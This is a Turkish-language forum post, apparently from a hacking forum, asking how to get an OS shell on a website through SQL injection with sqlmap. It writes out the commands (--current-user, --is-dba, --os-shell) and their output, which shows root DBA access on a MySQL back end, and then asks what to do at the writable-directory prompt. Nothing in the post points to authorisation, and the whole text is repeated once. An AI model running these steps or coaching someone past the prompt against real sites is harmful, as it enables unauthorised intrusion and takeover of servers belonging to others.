Merhaba arkadaslar sqlmap'de shell atmakta sorun yaşıyorum oncelikle komutlar ve çıktılar şu şekilde ;
sqlmap -u site.com/index.php?id=10 -o -b --current-user --is-dba ' komutunu giriyorum çıkan sonuç ;
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.6
back-end DBMS: MySQL 5.0
banner: '5.1.48-community'
[08:24:04] [INFO] fetching current user
current user: 'root@localhost'
[08:24:04] [INFO] testing if current user is DBA
[08:24:04] [INFO] fetching current user
current user is DBA: True
Değer TRUE çıktı shell atılabilir. diğer komutum ;
sqlmap -u site.com/index.php?id=10 -o --os-shell çıkan sonuç ;
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
Web sitesi php oldugu için PHP seçeneğini seçiyorum. bana 2 adet upload linki vermesi lazım ama herhangi bir link vermedi çıkan sonuç ;
what do you want to use for writable directory?
[1] common ********(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom ********(s)
[3] custom directory list file
[4] brute force search
bana upload linki vermedi ve 4 seçenek verdi. bu adımda ne yapmam lazım ? yardımlarınızı bekliyorum
sqlmap -u site.com/index.php?id=10 -o -b --current-user --is-dba ' komutunu giriyorum çıkan sonuç ;
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.6
back-end DBMS: MySQL 5.0
banner: '5.1.48-community'
[08:24:04] [INFO] fetching current user
current user: 'root@localhost'
[08:24:04] [INFO] testing if current user is DBA
[08:24:04] [INFO] fetching current user
current user is DBA: True
Değer TRUE çıktı shell atılabilir. diğer komutum ;
sqlmap -u site.com/index.php?id=10 -o --os-shell çıkan sonuç ;
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
Web sitesi php oldugu için PHP seçeneğini seçiyorum. bana 2 adet upload linki vermesi lazım ama herhangi bir link vermedi çıkan sonuç ;
what do you want to use for writable directory?
[1] common ********(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom ********(s)
[3] custom directory list file
[4] brute force search
bana upload linki vermedi ve 4 seçenek verdi. bu adımda ne yapmam lazım ? yardımlarınızı bekliyorum
